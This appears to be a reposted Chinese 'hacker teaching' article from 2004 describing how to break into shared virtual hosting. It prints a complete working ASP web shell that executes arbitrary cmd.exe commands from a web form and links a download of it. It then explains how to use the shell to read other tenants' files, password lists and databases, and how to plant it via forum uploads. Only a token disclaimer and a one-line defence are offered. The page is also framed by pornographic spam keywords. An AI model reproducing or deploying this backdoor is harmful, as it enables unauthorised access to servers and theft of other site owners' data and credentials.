欧美性猛交XXXX免费看蜜桃,成人网18免费韩国,亚洲国产成人精品区综合,欧美日韩一区二区三区高清不卡,亚洲综合一区二区精品久久

打開(kāi)APP
userphoto
未登錄

開(kāi)通VIP,暢享免費電子書(shū)等14項超值服

開(kāi)通VIP

首頁(yè)

好書(shū)

留言交流

下載APP

聯(lián)系客服
入侵虛擬主機的簡(jiǎn)單方案
 來(lái)源:紫龍  作者:  類(lèi)別:黑客教學(xué)  日期:2004-10-14 23:43:19  今日/總瀏覽: 2/475  


下午突然的一個(gè)想法,就是利用一個(gè)ASP程序(1K多點(diǎn))來(lái)攻破整個(gè)虛擬主機,照著(zhù)自己的想法居然真的能突破虛擬主機,不過(guò)又多了一份擔心,如果真的這樣,那網(wǎng)絡(luò )豈不是又無(wú)安寧之日了。先讓大家看這個(gè)ASP的程序:
<%@ Language=VBScript %>
<%
<!-- 申明變量 -->
Dim oScript
Dim oScriptNet
Dim oFileSys, oFile
Dim szCMD, szTempFile
<!-- 錯誤定義 -->
On Error Resume Next
<!--建立你將要用到的COM項目 -->
Set oScript = Server.CreateObject("WSCRIPT.SHELL")
Set oScriptNet = Server.CreateObject("WSCRIPT.NETWORK")
Set oFileSys = Server.CreateObject("Scripting.FileSystemObject")
<!-- 這個(gè)是定義變量 -->
szCMD = Request.Form(".CMD")
If (szCMD <> "") Then
<!-- 這里是關(guān)鍵,注意一點(diǎn) ,就是調用CMD.EXE-->
szTempFile = "C:\" & oFileSys.GetTempName( )
Call oScript.Run ("cmd.exe /c " & szCMD & " > " & szTempFile, 0, True)
Set oFile = oFileSys.OpenTextFile (szTempFile, 1, False, 0)
End If
%>
<HTML>
<BODY>
<FORM action="<%= Request.ServerVariables("URL") %>" method="POST">
<input type=text name=".CMD" size=45 value="<%= szCMD %>">
<input type=submit value="Run">
</FORM>
<PRE>
<%
If (IsObject(oFile)) Then
On Error Resume Next
Response.Write Server.HTMLEncode(oFile.ReadAll)
oFile.Close
Call oFileSys.DeleteFile(szTempFile, True)
End If
%>
</BODY>
</HTML>
對于搞編程的人來(lái)說(shuō),這個(gè)根本不算難,只不過(guò)是一個(gè)小小的后門(mén)程序而已。但是否想過(guò)這個(gè)的功能呢?讓我說(shuō)下自己的一些思路吧!
比如你買(mǎi)了一個(gè)空間,只是一個(gè)虛擬主機的空間而已,也許上面有30個(gè)網(wǎng)站,更或者說(shuō)是50個(gè),甚至更多。如果你把上面這個(gè)文件傳到空間的一個(gè)目錄上,然后再到瀏覽器上執行,你會(huì )發(fā)現它有本地執行cmd.exe的功能,當然我指的是一般用戶(hù)的功能。一般情況下,虛擬主機中會(huì )保留這樣一個(gè)備份文件user.txt,里面包括了一些空間用戶(hù)的資料以及密碼,可以說(shuō)這個(gè)都是人們習慣了。就算你沒(méi)有,當然我也可以得到一切的一切,暫且讓我稱(chēng)自己的空間為A吧,然后我要看到了空間B上有好多好多東西,那我就可以直接通過(guò)dir命令查找,也許你無(wú)意中會(huì )發(fā)現一個(gè)login.asp的文件,不煩用type的命令打開(kāi)看看吧!哦,一層一層的推過(guò)去,很方便的就可以查看到了你想要的數據庫文件。再或者這樣吧,COPY命令說(shuō)大多搞計算機的人都會(huì )用吧,你也可以把他的文件拷貝到你空間的目錄上,然后再下載到本地慢慢看。還有很多的命令那就等著(zhù)你自己去慢慢的摸索吧,就算是得到主機的用戶(hù)密碼也不再算是困難了。
特別提醒的是論壇,只要在論壇里添加一個(gè)可以上傳ASP的選項目,這個(gè)主機也就可以用上述的方法入侵了。請各大論壇引起注意。
我把這個(gè)思想寫(xiě)出來(lái),并不是叫大家去搞這些主機,而是想讓廣大用戶(hù)引起注意。由于參照這篇文章而導致的后果與作者無(wú)關(guān)。上面提到的這個(gè)ASP后門(mén)程序可以
http://www.qiker.com/down/cmdasp.rar<;/P><P>現在想到的防范方法只有限制目錄權限
本站僅提供存儲服務(wù),所有內容均由用戶(hù)發(fā)布,如發(fā)現有害或侵權內容,請點(diǎn)擊舉報。
打開(kāi)APP,閱讀全文并永久保存 查看更多類(lèi)似文章
猜你喜歡
類(lèi)似文章
25款黑客小工具——菜鳥(niǎo)必備
校園網(wǎng)絡(luò )安全應急預案
幾個(gè)惡心的批處理
計算機安全知識
計算機信息管理技術(shù)在維護網(wǎng)絡(luò )安全中的應用策略
從電影《絕對控制》,看程序員如何“侵入”智能生活
更多類(lèi)似文章 >>
生活服務(wù)
分享 收藏 導長(cháng)圖 關(guān)注 下載文章
綁定賬號成功
后續可登錄賬號暢享VIP特權!
如果VIP功能使用有故障,
可點(diǎn)擊這里聯(lián)系客服!

聯(lián)系客服

欧美性猛交XXXX免费看蜜桃,成人网18免费韩国,亚洲国产成人精品区综合,欧美日韩一区二区三区高清不卡,亚洲综合一区二区精品久久